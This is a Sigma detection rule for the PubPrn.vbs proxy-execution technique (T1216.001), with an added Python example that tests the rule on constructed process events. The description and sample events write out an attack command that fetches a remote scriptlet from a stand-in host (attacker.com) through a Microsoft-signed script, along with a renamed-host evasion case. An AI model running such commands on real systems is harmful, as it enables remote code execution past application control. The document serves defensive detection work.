title: PubPrn (T1216.001)
id: df00tech-t1216-001
status: experimental
description: "Adversaries may abuse PubPrn.vbs to proxy execution of malicious remote scriptlet files. PubPrn.vbs is a Microsoft-signed Visual Basic Script located at C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs that publishes printers to Active Directory Domain Services. Because the script carries a Microsoft signature, it can be used to bypass application control solutions that trust Microsoft-signed code. Adversaries pass a script: URI as the second parameter (e.g., pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct) so that the script fetches and executes a remote COM scriptlet (.sct) file through scrobj.dll. The script is typically invoked via cscript.exe or wscript.exe. On Windows 10 and later, PubPrn.vbs only accepts an LDAP:// URI as the second parameter, which removes the remote code execution vector on those systems; legacy environments, and any environment that still runs an older copy of the script, may remain vulnerable."
references:
  - https://attack.mitre.org/techniques/T1216/001/
  - https://df00tech.com/detections/T1216.001
author: df00tech
date: 2026/04/19
tags:
  - attack.t1216.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Selection reconstructed from the rule description and the falsepositives note: a Windows
  # script host running pubprn.vbs with a script: moniker or a .sct payload reference.
  # The vendor's KQL/SPL query is on df00tech; adjust field names to your log pipeline.
  selection_host:
    Image|endswith:
      - '\cscript.exe'
      - '\wscript.exe'
    CommandLine|contains: 'pubprn.vbs'
  selection_payload:
    CommandLine|contains:
      - 'script:'
      - '.sct'
  condition: selection_host and selection_payload
falsepositives:
  - "Legacy printer management scripts that invoke pubprn.vbs legitimately with an LDAP:// target; these should not match as long as the query requires a script: URI or a .sct reference in the command line"
  - Red team or penetration testing exercises using PubPrn as a living-off-the-land bypass
  - Security researchers validating detection coverage by running atomic tests in a lab
level: high
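The following is an added example, not part of the df00tech rule or any vendor query: it mirrors the rule's process_creation selection (script host, pubprn.vbs, and a script: or .sct marker, all matched case-insensitively as Sigma does) in Python and runs it over constructed Sysmon-style events. The image paths, command lines and the printsrv01 / corp.example names are made up for the test; only the attacker.com payload URL comes from the rule description.

```python
"""Evaluate the PubPrn (T1216.001) selection against constructed process events.

Added example for the rule above; it is not the vendor's detection code.
Sigma's |endswith and |contains modifiers are case-insensitive, so every
comparison below is done on lower-cased strings.
"""
from dataclasses import dataclass

# Mirrors selection_host / selection_payload in the rule.
HOST_PROCESSES = ("\\cscript.exe", "\\wscript.exe")
TARGET_SCRIPT = "pubprn.vbs"
PAYLOAD_MARKERS = ("script:", ".sct")


@dataclass
class ProcessEvent:
    """Minimal process_creation record (Sysmon Event ID 1 style fields)."""
    image: str
    command_line: str


def matches_pubprn_rule(event: ProcessEvent) -> bool:
    """Return True when the event satisfies selection_host AND selection_payload."""
    image = event.image.lower()
    cmd = event.command_line.lower()
    if not image.endswith(HOST_PROCESSES):   # Image|endswith cscript/wscript
        return False
    if TARGET_SCRIPT not in cmd:             # CommandLine|contains pubprn.vbs
        return False
    return any(marker in cmd for marker in PAYLOAD_MARKERS)  # script: or .sct


# Constructed sample events (not captured telemetry).
SAMPLE_EVENTS = [
    # 1. Remote scriptlet via the script: moniker -> match
    ProcessEvent(
        r"C:\Windows\System32\cscript.exe",
        r'cscript.exe "C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs" '
        r"127.0.0.1 script:https://attacker.com/payload.sct",
    ),
    # 2. Legitimate printer publishing with an LDAP:// target -> no match
    ProcessEvent(
        r"C:\Windows\System32\cscript.exe",
        r'cscript.exe pubprn.vbs printsrv01 "LDAP://CN=Computers,DC=corp,DC=example"',
    ),
    # 3. Unrelated printing admin script -> no match
    ProcessEvent(r"C:\Windows\System32\cscript.exe", r"cscript.exe prnport.vbs -l"),
    # 4. Mixed case, local .SCT path, 32-bit wscript -> match (case-insensitive contains)
    ProcessEvent(
        r"C:\Windows\SysWOW64\WScript.exe",
        r"WScript.exe PubPrn.vbs localhost SCRIPT:C:\Users\Public\stage.SCT",
    ),
    # 5. Renamed script host: the Image filter misses it -> no match (coverage gap)
    ProcessEvent(
        r"C:\Users\Public\cs.exe",
        r"cs.exe pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct",
    ),
]


def evaluate_samples() -> list:
    """Apply the selection to every sample event, preserving order."""
    return [matches_pubprn_rule(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate_samples()):
        print("MATCH " if hit else "      ", event.command_line)
```

Event 5 illustrates why an `Image|endswith` filter alone is a weak anchor: a renamed copy of cscript.exe evades it. Adding `OriginalFileName` (cscript.exe / wscript.exe) as an alternative to the Image check closes that gap where your log source carries PE version information.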
